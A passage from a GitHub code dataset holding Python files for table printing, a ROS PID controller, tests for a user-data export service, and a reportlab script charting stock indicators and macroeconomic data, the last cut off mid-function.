locale.setlocale(locale.LC_NUMERIC, \"\")\n\n\nclass Table:\n def format_num(self, num):\n \"\"\"Format a number according to given places.\n Adds commas, etc. Will truncate floats into ints!\"\"\"\n\n try:\n if \".\" in num:\n inum = float(num)\n return locale.format(\"%.2f\", (0, inum), True)\n else:\n inum = int(num)\n return locale.format(\"%.*f\", (0, inum), True)\n\n except (ValueError, TypeError):\n return str(num.encode('utf-8')) if isinstance(num, six.string_types) else str(num)\n\n def get_max_width(self, table, index):\n \"\"\"Get the maximum width of the given column index\"\"\"\n return max([len(self.format_num(row[index])) for row in table])\n\n def pprint_table(self, table):\n \"\"\"Prints out a table of data, padded for alignment\n @param table: The table to print. A list of lists.\n Each row must have the same number of columns. \"\"\"\n col_paddings = []\n\n out = \"\"\n for i in range(len(table[0])):\n col_paddings.append(self.get_max_width(table, i))\n\n for row in table:\n # left col\n out += str(row[0]).ljust(col_paddings[0] + 1)\n # rest of the cols\n for i in range(1, len(row)):\n col = self.format_num(row[i]).rjust(col_paddings[i] + 2)\n out += col\n out += \"\\n\"\n\n return out\n\n\nif __name__ == \"__main__\":\n T = Table()\n T.bumppath = '/home/jmht/ample-dev1/examples/toxd-example/ROSETTA_MR_3/MRBUMP/cluster_run1'\n T.cluster = True\n table = T.maketable()\n out = sys.stdout\n T.pprint_table(out, table)\n","repo_name":"rigdenlab/ample","sub_path":"ample/util/printTable.py","file_name":"printTable.py","file_ext":"py","file_size_in_byte":1850,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"36"}
+{"seq_id":"74328269543","text":"#!/usr/bin/env python\n\"\"\"\nThe `pid.py` module is a Python implementation of a\nProportional-Integral-Derivative controller for ROS. By default, it listens on\na topic \"desired\" for the current set point and a topic \"state\" for the current\nstate of the plant being controlled. It then writes to a topic \"cmd\" with the\noutput of the PID controller. If the parameter `variable` is defined, these\ntopics will be renamed as follows. This makes it easy to integrate this PID\ncontroller with ROS topics from firmware modules without remapping each of the\ntopics individually.\n\n    desired -> <variable>/desired\n    state -> <variable>/measured\n    cmd -> <variable>/commanded\n\nIt also reads configuration from a number of other ROS parameters. The\ncontroller gains are passed in as parameters `Kp`, `Ki`, and `Kd`. 
It also\naccepts an `upper_limit` and `lower_limit` to bound the control effort output.\n`windup_limit` defines a limit for the integrator of the control loop.\n`deadband_width` can be used to apply a deadband to the control efforts.\nSpecifically, commands with absolute value less than `deadband_width` will be\nchanged to 0.\n\"\"\"\nimport rospy\nfrom std_msgs.msg import Float64, String\n\nclass PID:\n \"\"\" Discrete PID control \"\"\"\n def __init__(self, Kp=0, Ki=0, Kd=0, upper_limit=1, lower_limit=-1,\n windup_limit=1000, deadband_width=0):\n self.Kp = Kp\n self.Ki = Ki\n self.Kd = Kd\n self.upper_limit = upper_limit\n self.lower_limit = lower_limit\n self.windup_limit = windup_limit\n self.deadband_width = deadband_width\n\n self.set_point = None\n self.last_error = 0\n self.integrator = 0\n\n def update(self, state):\n # If setpoint was made null, or was already null, do nothing.\n if self.set_point is None:\n return\n\n error = self.set_point - state\n\n if abs(error) < self.deadband_width:\n return 0\n\n p_value = self.Kp * error\n d_value = self.Kd * (error - self.last_error)\n self.last_error = error\n self.integrator = self.integrator + error\n self.integrator = max(-self.windup_limit, min(self.windup_limit, self.integrator))\n i_value = self.Ki * self.integrator\n\n res = p_value + i_value + d_value\n res = min(self.upper_limit, max(self.lower_limit, res))\n\n return res\n\nif __name__ == '__main__':\n rospy.init_node('pid')\n\n # Make sure that we're under an environment namespace.\n namespace = rospy.get_namespace()\n if namespace == '/':\n raise RuntimeError(\n \"Cannot be run in the global namespace. Please \"\n \"designate an environment for this module.\"\n )\n\n param_names = [\n \"Kp\", \"Ki\", \"Kd\", \"lower_limit\", \"upper_limit\", \"windup_limit\",\n \"deadband_width\"\n ]\n param_values = {}\n for param_name in param_names:\n private_param_name = \"~\" + param_name\n if rospy.has_param(private_param_name):\n param_values[param_name] = rospy.get_param(private_param_name)\n\n pid = PID(**param_values)\n\n pub_name = \"cmd\"\n state_sub_name = \"state\"\n desired_sub_name = \"desired\"\n\n variable = rospy.get_param(\"~variable\", None)\n if variable is not None:\n pub_name = \"{}/commanded\".format(variable)\n state_sub_name = \"{}/measured\".format(variable)\n desired_sub_name = \"{}/desired\".format(variable)\n\n pub = rospy.Publisher(pub_name, Float64, queue_size=10)\n\n def state_callback(item):\n cmd = pid.update(item.data)\n if cmd is None:\n return\n pub.publish(cmd)\n\n def set_point_callback(item):\n pid.set_point = item.data\n\n # When we receive the recipe end message, reset this PID controller to its default values.\n # This disables the set point so the controller will just idle until it is set by a new recipe.\n def recipe_end_callback(item):\n pid = PID(**param_values)\n pid.set_point = None\n\n recipe_end_topic = \"{ns}recipe_end/desired\".format(ns=rospy.get_namespace())\n recipe_end_sub = rospy.Subscriber(recipe_end_topic, String, recipe_end_callback)\n state_sub = rospy.Subscriber(state_sub_name, Float64, state_callback)\n set_point_sub = rospy.Subscriber(\n desired_sub_name, Float64, set_point_callback\n )\n\n rospy.spin()\n","repo_name":"OpenAgricultureFoundation/openag_brain","sub_path":"nodes/pid.py","file_name":"pid.py","file_ext":"py","file_size_in_byte":4327,"program_lang":"python","lang":"en","doc_type":"code","stars":222,"dataset":"github-code","pt":"36"}
+{"seq_id":"15586536002","text":"import datetime\nimport io\nimport json\nimport 
os\nimport zipfile\nfrom unittest.mock import call\n\nimport boto3\nimport settings\nfrom moto import mock_s3\n\nimport pytest\nfrom userauth.services.export import ExportUserArchive\nfrom utils import hashid\n\npytestmark = pytest.mark.usefixtures('db_session')\n\n\nclass TestExportUserArchive:\n @pytest.fixture\n def user(self, user_factory):\n return user_factory.create()\n\n @pytest.fixture\n def export_user_archive(self, user) -> ExportUserArchive:\n return ExportUserArchive(user=user)\n\n @pytest.fixture\n def mocked_zip_file(self, mocker):\n zip_file_mock = mocker.MagicMock(spec=zipfile.ZipFile)\n mocker.patch(\"zipfile.ZipFile\", return_value=zip_file_mock)\n mocked_zip_file = zip_file_mock.__enter__.return_value = mocker.Mock()\n\n return mocked_zip_file\n\n @pytest.fixture\n def file_cleanup(self, user):\n hashed_user_id = hashid.encode(user.id)\n yield\n os.remove(f\"/tmp/{hashed_user_id}.zip\")\n\n def test_user_data_is_exported(self, user, export_user_archive):\n data = export_user_archive._export_user_data()\n assert data.get(\"user\") == json.dumps(\n {\n \"id\": user.id,\n \"profile\": {\n \"id\": user.profile.id,\n \"first_name\": user.profile.first_name,\n \"last_name\": user.profile.last_name,\n },\n \"email\": user.email,\n \"is_superuser\": user.is_superuser,\n \"is_active\": user.is_active,\n \"is_confirmed\": user.is_confirmed,\n \"created\": user.created.isoformat(),\n }\n )\n\n def test_crud_demo_items_data_is_exported(self, user, crud_demo_item_factory, export_user_archive):\n item = crud_demo_item_factory.create(created_by=user)\n data = export_user_archive._export_user_data()\n assert data.get(\"crud_demo_items\") == [json.dumps({\"id\": item.id, \"name\": item.name})]\n\n def test_document_demo_item_is_exported(self, user, document_demo_item_factory, export_user_archive):\n document = document_demo_item_factory.create(created_by=user)\n data = export_user_archive._export_user_files()\n assert document.file in data\n\n @mock_s3\n def test_zip_archive_is_created(self, user, document_demo_item_factory, mocked_zip_file, export_user_archive):\n s3 = boto3.client(\"s3\", region_name='us-east-1', endpoint_url=settings.AWS_S3_ENDPOINT_URL)\n s3.create_bucket(Bucket=settings.AWS_STORAGE_BUCKET_NAME)\n document_item = document_demo_item_factory.create()\n user_data = {\"user\": \"data\"}\n document_content = b\"content\"\n with io.BytesIO() as document_file:\n document_file.write(document_content)\n document_file.seek(0)\n s3.upload_fileobj(document_file, settings.AWS_STORAGE_BUCKET_NAME, document_item.file)\n hashed_user_id = hashid.encode(user.id)\n\n archive_file_path = export_user_archive._export_user_archive_to_zip(\n user_data=user_data, user_files=[document_item.file]\n )\n\n assert archive_file_path == f\"/tmp/{hashed_user_id}.zip\"\n assert [\n call.writestr(f'{hashed_user_id}/{hashed_user_id}.json', json.dumps(user_data).encode('utf-8')),\n call.writestr(f'{hashed_user_id}/{document_item.file}', document_content),\n ] in mocked_zip_file.mock_calls\n\n @pytest.mark.usefixtures('file_cleanup', 's3_exports_bucket')\n @pytest.mark.freeze_time\n def test_user_archive_export_url_is_generated(self, user, export_user_archive):\n timestamp = datetime.datetime.now().strftime(\"%d-%m-%y_%H-%M-%S\")\n expected_obj_key = f\"exports/{hashid.encode(user.id)}_{timestamp}.zip\"\n\n export_url = export_user_archive.run()\n\n assert settings.AWS_EXPORTS_STORAGE_BUCKET_NAME in export_url\n assert expected_obj_key in 
export_url\n","repo_name":"apptension/saas-boilerplate","sub_path":"packages/workers/userauth/tests/test_services.py","file_name":"test_services.py","file_ext":"py","file_size_in_byte":3959,"program_lang":"python","lang":"en","doc_type":"code","stars":1208,"dataset":"github-code","pt":"36"} +{"seq_id":"32143238057","text":"# encoding = utf-8\n\nfrom SDK.SDKHeader import *\nimport random\nfrom General.GlobalSetting import stk_basic\nimport pandas as pd\nimport numpy as np\nfrom reportlab.graphics.charts.barcharts import VerticalBarChart\nfrom reportlab.graphics.charts.legends import Legend\n\nfrom reportlab.lib.pagesizes import letter\n\nfrom reportlab.platypus import *\nfrom reportlab.lib.styles import getSampleStyleSheet\n\n# 画图相关\nfrom reportlab.graphics.shapes import Drawing, PolyLine, colors, Auto\nfrom reportlab.graphics import renderPDF\nfrom reportlab.graphics.charts.lineplots import LinePlot\nfrom reportlab.graphics.widgets.markers import makeMarker\nfrom reportlab.pdfbase.pdfmetrics import stringWidth\nfrom reportlab.pdfbase.ttfonts import TTFont\nfrom reportlab.pdfbase import pdfmetrics\n\npdfmetrics.registerFont(TTFont('song', 'SURSONG.TTF'))\npdfmetrics.registerFont(TTFont('hei', 'SIMHEI.TTF'))\n\nfrom reportlab.lib import fonts\nfonts.addMapping('song', 0, 0, 'song')\nfonts.addMapping('song', 0, 1, 'song')\nfonts.addMapping('song', 1, 0, 'hei')\nfonts.addMapping('song', 1, 1, 'hei')\n\n\ndef addFront(canvas_param, theme, subtitle, pagesize=letter):\n \"\"\"\n 函数功能:为pdf文档添加功能,分“主题”、“副标题”两部分\n :param canvas:\n :param pagesize: 页面大小,默认A4\n :param theme: 主题字符串\n :param subtitle: 副标题字符串\n :return:\n \"\"\"\n PAGE_WIDTH = pagesize[0]\n PAGE_HEIGHT = pagesize[1]\n\n # 设置主标题字体并打印主标题\n canvas_param.setFont(\"song\", 30)\n canvas_param.drawString((PAGE_WIDTH-stringWidth(theme, fontName='song', fontSize=30))/2.0, PAGE_HEIGHT*0.618, theme)\n\n # 设置副标题字体并打印副标题\n canvas_param.setFont(\"song\", 10)\n canvas_param.drawString((PAGE_WIDTH-stringWidth(theme, fontName='song', fontSize=30))/2.0, PAGE_HEIGHT*0.15, subtitle)\n\n canvas_param.showPage()\n\n return canvas_param\n\n\ndef add_legend(draw_obj, chart, pos_x, pos_y):\n\n \"\"\"\n 函数功能:voltGroupDisplayByBar函数的子函数\n :param draw_obj:\n :param chart:\n :return:\n \"\"\"\n legend = Legend()\n legend.alignment = 'right'\n legend.fontName = 'song'\n legend.columnMaximum = 2\n legend.x = pos_x\n legend.y = pos_y\n legend.colorNamePairs = Auto(obj=chart)\n draw_obj.add(legend)\n\n\ndef ExtractPointFromDf_DateX(df_origin, date_col, y_col, timeAxis='day'):\n\n \"\"\"\n 函数功能:从一个dataframe中提取两列,组成point列表格式,以供ReportLab画图之用\n 同时将日期中的时间提取出来,转为秒。\n\n 本函数主要用来画当日数据!因为将datetime中的date去掉了,只保留time。\n\n :param df_origin:\n :param x_col:\n :param y_col:\n :return:\n \"\"\"\n\n # 将“data”列中的数据解析后,作为新的列增加到df中\n # df_origin = ExtractJsonToColum(df_row=df_origin, col='data')\n # if len(df_origin) == 0:\n # return []\n\n # 按时间排序,并删除空值\n df_origin = df_origin.sort_values(by=date_col, ascending=True)\n df_origin = df_origin[True - df_origin[y_col].isnull()]\n\n # if len(df_origin) == 0:\n # print('函数 ExtractPointFromDf_DateX:删除空值后,dataframe为空!入参df中不含指定列')\n # return df_origin\n\n # 提取时间,并将时间转为秒\n if timeAxis == 'day':\n df_origin['time'] = df_origin.apply(lambda x: DateStr2Sec(str(x[date_col])), axis=1)\n\n elif timeAxis == 'datetime':\n df_origin['time'] = df_origin.apply(lambda x: DatetimeStr2Sec(str(x[date_col])), axis=1)\n\n elif timeAxis == 'quarter':\n df_origin['time'] = df_origin.apply(lambda x: convertQuarter2Value(str(x[date_col])), axis=1)\n\n elif timeAxis == 
'year':\n df_origin['time'] = df_origin.apply(lambda x: x[date_col], axis=1)\n\n elif timeAxis == 'month':\n df_origin['time'] = df_origin.apply(lambda x:DateStr2Sec(stdMonthDate2ISO(str(x[date_col]))),axis=1)\n\n # 单独取出相应两列,准备转成point格式\n df_part = df_origin.loc[:, ['time', y_col]]\n\n # 将df转为array\n point_array = list(map(lambda x: (x[0], float(x[1])), df_part.values))\n\n return point_array\n\n\ndef addAcTemp(canvas_param, opc_df_today,pos_x, pos_y, width, height):\n\n total_df = opc_df_today\n\n # 取出\n # “室外天气”、\n # “冷却侧供水温度”、\n # “冷却侧回水温度”、\n # “冷冻侧供水温度”、\n # “冷冻侧回水温度”\n total_df_OAT = total_df[total_df.browse_name == 'OA-T']\n\n total_df_CSSWT = total_df[total_df.browse_name == 'CS-SWT']\n total_df_CSRWT = total_df[total_df.browse_name == 'CS-RWT']\n\n total_df_FSSWT = total_df[total_df.browse_name == 'FS-SWT']\n total_df_FSRWT = total_df[total_df.browse_name == 'FS-RWT']\n\n # 生成5个变量相应的点阵\n data_OAT = ExtractPointFromDf_DateX(df_origin=total_df_OAT, date_col='present_value_source_timestamp',\n y_col='present_value_value')\n\n data_CSSWT = ExtractPointFromDf_DateX(df_origin=total_df_CSSWT, date_col='present_value_source_timestamp',\n y_col='present_value_value')\n data_CSRWT = ExtractPointFromDf_DateX(df_origin=total_df_CSRWT, date_col='present_value_source_timestamp',\n y_col='present_value_value')\n\n data_FSSWT = ExtractPointFromDf_DateX(df_origin=total_df_FSSWT, date_col='present_value_source_timestamp',\n y_col='present_value_value')\n data_FSRWT = ExtractPointFromDf_DateX(df_origin=total_df_FSRWT, date_col='present_value_source_timestamp',\n y_col='present_value_value')\n\n data_origin = [tuple(data_OAT), tuple(data_CSSWT), tuple(data_CSRWT), tuple(data_FSSWT), tuple(data_FSRWT)]\n\n # 定义各曲线标签\n data_name_origin = ['室外温度', '冷却侧供水温度', '冷却侧回水温度', '冷冻侧供水温度', '冷冻侧回水温度']\n\n # 处理某条线没有数据的情况,若不处理“没有数据”的情况,画线的时候会报错!\n data = []\n data_name = []\n\n for i in range(0, len(data_origin)):\n if len(data_origin[i]) != 0:\n data.append(data_origin[i])\n data_name.append(data_name_origin[i])\n\n if len(data) == 0:\n print('函数 addAcTemp:原始df解析后没有想要的温度数据!')\n return canvas_param\n\n c = canvas_param\n # c.setFont(\"song\", 10)\n\n drawing = Drawing(width=width, height=height)\n\n lp = LinePlot()\n # lp.x = 50\n # lp.y = 50\n lp.height = height\n lp.width = width\n lp.data = data\n lp.joinedLines = 1\n\n # 定义各曲线颜色\n lp.lines[0].strokeColor = colors.blue\n lp.lines[1].strokeColor = colors.red\n lp.lines[2].strokeColor = colors.lightgreen\n lp.lines[3].strokeColor = colors.orange\n lp.lines[4].strokeColor = colors.darkgreen\n\n for i in range(0, len(data)):\n lp.lines[i].name = data_name[i]\n lp.lines[i].symbol = makeMarker('FilledCircle', size=0.5)\n lp.lines[i].strokeWidth = 0.2\n\n # lp.lineLabelFormat = '%2.0f'\n # lp.strokeColor = colors.black\n\n lp.xValueAxis.valueMin = 0\n lp.xValueAxis.valueMax = 60*60*24\n lp.xValueAxis.valueSteps = [n for n in range(0, 60*60*24, 60*60)]\n lp.xValueAxis.labelTextFormat = lambda x: str(s2t(x))[0:2]\n lp.yValueAxis.valueMin = 0\n # lp.yValueAxis.valueMax = 50\n # lp.yValueAxis.valueSteps = [1, 2, 3, 5, 6]\n drawing.add(lp)\n add_legend(draw_obj=drawing, chart=lp, pos_x=10, pos_y=-10)\n\n renderPDF.draw(drawing=drawing, canvas=c, x=pos_x, y=pos_y)\n\n\ndef genLPDrawing(data, data_note, width=letter[0]*0.8, height=letter[1]*0.25, timeAxis='day', y_min_zero=False):\n \"\"\"\n 函数功能:生成Drawing之用\n :return:\n \"\"\"\n\n drawing = Drawing(width=width, height=height)\n\n lp = LinePlot()\n # lp.x = 50\n # lp.y = 50\n lp.height = height\n lp.width = width\n lp.data = 
data\n lp.joinedLines = 1\n\n # 定义颜色集\n barFillColors = [\n colors.red, colors.green, colors.blue, colors.darkgoldenrod,\n colors.pink, colors.purple, colors.lightgreen, colors.darkblue, colors.lightyellow,\n colors.fidred, colors.greenyellow, colors.gray, colors.white,colors.blueviolet, colors.lightgoldenrodyellow]\n\n for i in range(0, len(data)):\n lp.lines[i].name = data_note[i]\n lp.lines[i].symbol = makeMarker('FilledCircle', size=0.5)\n lp.lines[i].strokeWidth = 0.2\n lp.lines[i].strokeColor = barFillColors[i]\n\n # lp.lineLabelFormat = '%2.0f'\n # lp.strokeColor = colors.black\n\n x_min = data[0][0][0]\n x_max = data[0][-1][0]\n\n lp.xValueAxis.valueMin = x_min\n lp.xValueAxis.valueMax = x_max\n\n if timeAxis=='day':\n step = int(((x_max - x_min) / (60 * 60 * 24)) / 30) + 1\n\n lp.xValueAxis.valueSteps = [n for n in range(int(x_min), int(x_max), 60 * 60 * 24 * step)]\n lp.xValueAxis.labelTextFormat = lambda x: str(Sec2Datetime(x)[0:10])\n lp.xValueAxis.labels.angle = 90\n lp.xValueAxis.labels.fontSize = 6\n lp.xValueAxis.labels.dy = -18\n if y_min_zero:\n lp.yValueAxis.valueMin = 0\n\n # lp.yValueAxis.valueMax = 50\n # lp.yValueAxis.valueSteps = [1, 2, 3, 5, 6]\n\n elif timeAxis=='quarter':\n\n step = int(((x_max - x_min)/0.25) / 30) + 1\n\n lp.xValueAxis.valueSteps = [n for n in range(int(x_min), int(x_max), int(math.ceil(0.25 * step)))]\n lp.xValueAxis.labelTextFormat = lambda x: convertValue2Quarter(x)\n lp.xValueAxis.labels.angle = 90\n lp.xValueAxis.labels.fontSize = 6\n lp.xValueAxis.labels.dy = -18\n\n if y_min_zero:\n lp.yValueAxis.valueMin = 0\n\n elif timeAxis=='year':\n\n lp.xValueAxis.valueSteps = [n for n in range(int(x_min), int(x_max), 1)]\n lp.xValueAxis.labelTextFormat = lambda x: str(x)\n lp.xValueAxis.labels.angle = 90\n lp.xValueAxis.labels.fontSize = 6\n lp.xValueAxis.labels.dy = -18\n\n if y_min_zero:\n lp.yValueAxis.valueMin = 0\n\n elif timeAxis=='month':\n\n lp.xValueAxis.valueSteps = list(map(lambda x:x[0],data[0]))\n lp.xValueAxis.labelTextFormat = lambda x: str(Sec2Datetime(x))[0:7]\n lp.xValueAxis.labels.angle = 90\n lp.xValueAxis.labels.fontSize = 6\n lp.xValueAxis.labels.dy = -18\n\n if y_min_zero:\n lp.yValueAxis.valueMin = 0\n\n drawing.add(lp)\n add_legend(draw_obj=drawing, chart=lp, pos_x=10, pos_y=-20)\n\n return drawing\n\n\ndef genBarDrawing(data, data_note, width=letter[0]*0.8, height=letter[1]*0.25):\n \"\"\"\n 函数功能:生成Drawing之用\n :return:\n \"\"\"\n data_value = list(map(lambda x:x[1],data))\n\n data_finale = [tuple(data_value)]\n\n drawing = Drawing(width=width, height=height)\n\n\n bc = VerticalBarChart()\n\n # bc.x = 50\n # bc.y = 50\n # bc.height = 125\n bc.width = width\n bc.data = data_finale\n # bc.valueAxis.valueMin = 0\n bc.barSpacing = 0\n\n # bc.valueAxis.valueMax = 50\n # bc.valueAxis.valueStep = 10\n # bc.categoryAxis.style = 'stacked'\n bc.categoryAxis.labels.boxAnchor = 'ne'\n bc.categoryAxis.labels.dx = 8\n bc.categoryAxis.labels.dy = -2\n bc.categoryAxis.labels.angle = 30\n\n barFillColors = [\n colors.red, colors.green, colors.white, colors.blue, colors.yellow,\n colors.pink, colors.purple, colors.lightgreen, colors.darkblue, colors.lightyellow,\n colors.fidred, colors.greenyellow, colors.gray, colors.blueviolet, colors.lightgoldenrodyellow]\n\n for i in range(len(data_finale)):\n bc.bars[i].name = data_note[i]\n\n # 最多只支持15种颜色,多出的设置为红色\n if i < 15:\n bc.bars[i].fillColor = barFillColors[i]\n else:\n bc.bars[i].fillColor = colors.red\n\n # x_min = data[0][0]\n # x_max = data[-1][0]\n\n # bc.xValueAxis.valueMin = x_min\n # 
lp.xValueAxis.valueMax = x_max\n\n # step = int(((x_max - x_min) / (60 * 60 * 24)) / 15) + 1\n\n # bc.categoryAxis.categoryNames = [str(Sec2Datetime(x))[0:10] for x in range(int(x_min), int(x_max), 60 * 60 * 24 * step)]\n\n drawing.add(bc)\n\n # 增加legend\n # add_legend(drawing, bc, pos_x=10, pos_y=-10)\n\n return drawing\n\n\ndef RPL_Bk_Page(canvas_para,bk_name):\n \"\"\"\n 函数功能:在pdf中增加bk信息,篇幅为一整页,或者更多,以页为单位\n :param bk_name:\n :param days: 用于指示近期的期限,比如近30天\n :return:\n \"\"\"\n\n\n # 插入字符串,用以表明stk代码及名称\n canvas_para.setFont(\"song\", 10)\n if bk_name in ['sh','sz','cyb']:\n stk_name = bk_name\n\n else:\n stk_name = stk_basic[stk_basic.index==bk_name]['name'].values[0]\n\n canvas_para.drawString(20, letter[1] - 10, bk_name + stk_name)\n\n\n\n sh_index = ts.get_hist_data(bk_name)\n sh_index['date'] = sh_index.index\n sh_index = sh_index.reset_index(drop=True)\n\n\n # 按时间降序排序,方便计算macd\n sh_index = sh_index.sort_values(by='date',ascending=True)\n\n # 在原始df中增加macd信息\n sh_index['MACD'],sh_index['MACDsignal'],sh_index['MACDhist'] = talib.MACD(sh_index.close,\n fastperiod=12, slowperiod=26, signalperiod=9)\n\n # 在原始数据中增加kdj信息\n sh_index['slowk'], sh_index['slowd'] = talib.STOCH(sh_index.high,\n sh_index.low,\n sh_index.close,\n fastk_period=9,\n slowk_period=3,\n slowk_matype=0,\n slowd_period=3,\n slowd_matype=0)\n\n\n # 添加rsi信息\n sh_index['RSI5'] = talib.RSI(sh_index.close, timeperiod=5)\n sh_index['RSI12'] = talib.RSI(sh_index.close, timeperiod=12)\n sh_index['RSI30'] = talib.RSI(sh_index.close, timeperiod=30)\n\n\n # 在原始数据中加入布林线\n sh_index['upper'], sh_index['middle'], sh_index['lower'] = talib.BBANDS(\n sh_index.close,\n timeperiod=20,\n # number of non-biased standard deviations from the mean\n nbdevup=2,\n nbdevdn=2,\n # Moving average type: simple moving average here\n matype=0)\n\n\n sh_index = sh_index.dropna(axis=0,how='any')\n\n close = ExtractPointFromDf_DateX(sh_index, 'date', 'close')\n m5 = ExtractPointFromDf_DateX(sh_index, 'date', 'ma5')\n m10 = ExtractPointFromDf_DateX(sh_index, 'date', 'ma10')\n m20 = ExtractPointFromDf_DateX(sh_index, 'date', 'ma20')\n\n macd = ExtractPointFromDf_DateX(sh_index, 'date', 'MACD')\n\n data = [tuple(close),tuple(m5),tuple(m10),tuple(m20)]\n data_name = ['close','m5','m10','m20']\n\n drawing_ave = genLPDrawing(data=data, data_note=data_name,height=letter[1]*0.15)\n renderPDF.draw(drawing=drawing_ave, canvas=canvas_para, x=10, y=letter[1] * 0.8)\n\n drawing_macd = genBarDrawing(data=macd, data_note=['macd'])\n renderPDF.draw(drawing=drawing_macd, canvas=canvas_para, x=10, y=letter[1]*0.6)\n\n\n # 整理kdj信息\n slowk = ExtractPointFromDf_DateX(sh_index, 'date', 'slowk')\n slowd = ExtractPointFromDf_DateX(sh_index, 'date', 'slowd')\n data_kdj = [tuple(slowk),tuple(slowd)]\n data_kdj_note = ['k','d']\n\n drawing_kdj = genLPDrawing(data=data_kdj, data_note=data_kdj_note,height=letter[1]*0.1)\n renderPDF.draw(drawing=drawing_kdj, canvas=canvas_para, x=10, y=letter[1] * 0.5)\n\n # 画图RSI信息\n RSI5 = ExtractPointFromDf_DateX(sh_index, 'date', 'RSI5')\n RSI12 = ExtractPointFromDf_DateX(sh_index, 'date', 'RSI12')\n RSI30 = ExtractPointFromDf_DateX(sh_index, 'date', 'RSI30')\n\n data_RSI = [tuple(RSI5),tuple(RSI12),tuple(RSI30)]\n data_RSI_note = ['RSI5','RSI12','RSI30']\n\n drawing_RSI = genLPDrawing(data=data_RSI, data_note=data_RSI_note,height=letter[1]*0.1)\n renderPDF.draw(drawing=drawing_RSI, canvas=canvas_para, x=10, y=letter[1] * 0.3)\n\n\n # 画图布林线\n upper = ExtractPointFromDf_DateX(sh_index, 'date', 'upper')\n middle = ExtractPointFromDf_DateX(sh_index, 
'date', 'middle')\n lower = ExtractPointFromDf_DateX(sh_index, 'date', 'lower')\n\n data_BOLL = [tuple(upper),tuple(middle),tuple(lower)]\n data_BOLL_note = ['上线','中线','下线']\n\n drawing_BOLL = genLPDrawing(data=data_BOLL, data_note=data_BOLL_note,height=letter[1]*0.1)\n renderPDF.draw(drawing=drawing_BOLL, canvas=canvas_para, x=10, y=letter[1] * 0.1)\n\n canvas_para.showPage()\n\n return canvas_para\n\n\ndef addMoneySupplyPage(canvas_para):\n \"\"\"\n 函数功能:在pdf中增加货币供应页\n :param canvas_para:\n :return:\n \"\"\"\n\n c = canvas_para\n\n c.setFont(\"song\", 10)\n c.drawString(10, letter[1] - 20, '货币供应')\n c.setLineWidth(3)\n c.line(10, letter[1] - 24, letter[0] - 10, letter[1] - 24)\n\n\n # 画货币供应量\n money_supply = ts.get_money_supply().replace('--',nan)\n money_supply['date'] = money_supply.apply(lambda x: stdMonthDate2ISO(x['month']), axis=1)\n\n # 画货币量曲线图\n m0 = ExtractPointFromDf_DateX(money_supply, 'date', 'm0')\n m1 = ExtractPointFromDf_DateX(money_supply, 'date', 'm1')\n m2 = ExtractPointFromDf_DateX(money_supply, 'date', 'm2')\n\n data_supply = [tuple(m0), tuple(m1), tuple(m2)]\n data_supply_note = ['m0', 'm1', 'm2']\n\n money_drawing = genLPDrawing(data=data_supply, data_note=data_supply_note, height=letter[1] * 0.2)\n renderPDF.draw(drawing=money_drawing, canvas=c, x=10, y=letter[1] * 0.7)\n\n # 画货币量增长率曲线图\n m0_yoy = ExtractPointFromDf_DateX(money_supply, 'date', 'm0_yoy')\n m1_yoy = ExtractPointFromDf_DateX(money_supply, 'date', 'm1_yoy')\n m2_yoy = ExtractPointFromDf_DateX(money_supply, 'date', 'm2_yoy')\n\n data_supply_yoy = [tuple(m0_yoy), tuple(m1_yoy), tuple(m2_yoy)]\n data_supply_yoy_note = ['m0增长率', 'm1增长率', 'm2增长率']\n\n money_yoy_drawing = genLPDrawing(data=data_supply_yoy, data_note=data_supply_yoy_note, height=letter[1] * 0.2)\n renderPDF.draw(drawing=money_yoy_drawing, canvas=c, x=10, y=letter[1] * 0.4)\n\n c.showPage()\n\n return c\n\n\ndef addReserveBaseRatePage(canvas_para):\n \"\"\"\n 函数功能:在pdf中增加准备金基率\n :param canvas_para:\n :return:\n \"\"\"\n\n c = canvas_para\n\n c.setFont(\"song\", 10)\n c.drawString(10, letter[1] - 20, '存款准备金基率')\n c.setLineWidth(3)\n c.line(10, letter[1] - 24, letter[0] - 10, letter[1] - 24)\n\n # 画银行准备金基率\n df_rbr = ts.get_rrr().replace('--', nan)\n # df_rbr['date'] = df_rbr.apply(lambda x: stdMonthDate2ISO(x['month']), axis=1)\n\n # 提取相关数据\n pot_before = ExtractPointFromDf_DateX(df_rbr, 'date', 'before')\n pot_now = ExtractPointFromDf_DateX(df_rbr, 'date', 'now')\n pot_changed = ExtractPointFromDf_DateX(df_rbr, 'date', 'changed')\n\n data_rbr = [tuple(pot_now)]\n data_rbr_note = ['准备金基率']\n\n money_drawing = genLPDrawing(data=data_rbr, data_note=data_rbr_note, height=letter[1] * 0.2)\n renderPDF.draw(drawing=money_drawing, canvas=c, x=10, y=letter[1] * 0.7)\n\n c.showPage()\n\n return c\n\n\ndef addQuarterGDPPage(canvas_para):\n\n \"\"\"\n 函数功能:增加季度GDP页\n :param canvas_para:\n :return:\n \"\"\"\n\n c = canvas_para\n\n gdp_quarter = ts.get_gdp_quarter()\n\n gdp_yoy = ExtractPointFromDf_DateX(df_origin=gdp_quarter, date_col='quarter', y_col='gdp_yoy', timeAxis='quarter')\n pi_yoy = ExtractPointFromDf_DateX(df_origin=gdp_quarter, date_col='quarter', y_col='pi_yoy', timeAxis='quarter')\n si_yoy = ExtractPointFromDf_DateX(df_origin=gdp_quarter, date_col='quarter', y_col='si_yoy', timeAxis='quarter')\n\n ti_yoy = ExtractPointFromDf_DateX(df_origin=gdp_quarter, date_col='quarter', y_col='ti_yoy', timeAxis='quarter')\n\n\n gdp_pull_drawing = genLPDrawing([tuple(gdp_yoy),tuple(pi_yoy),tuple(si_yoy),tuple(ti_yoy)],\n 
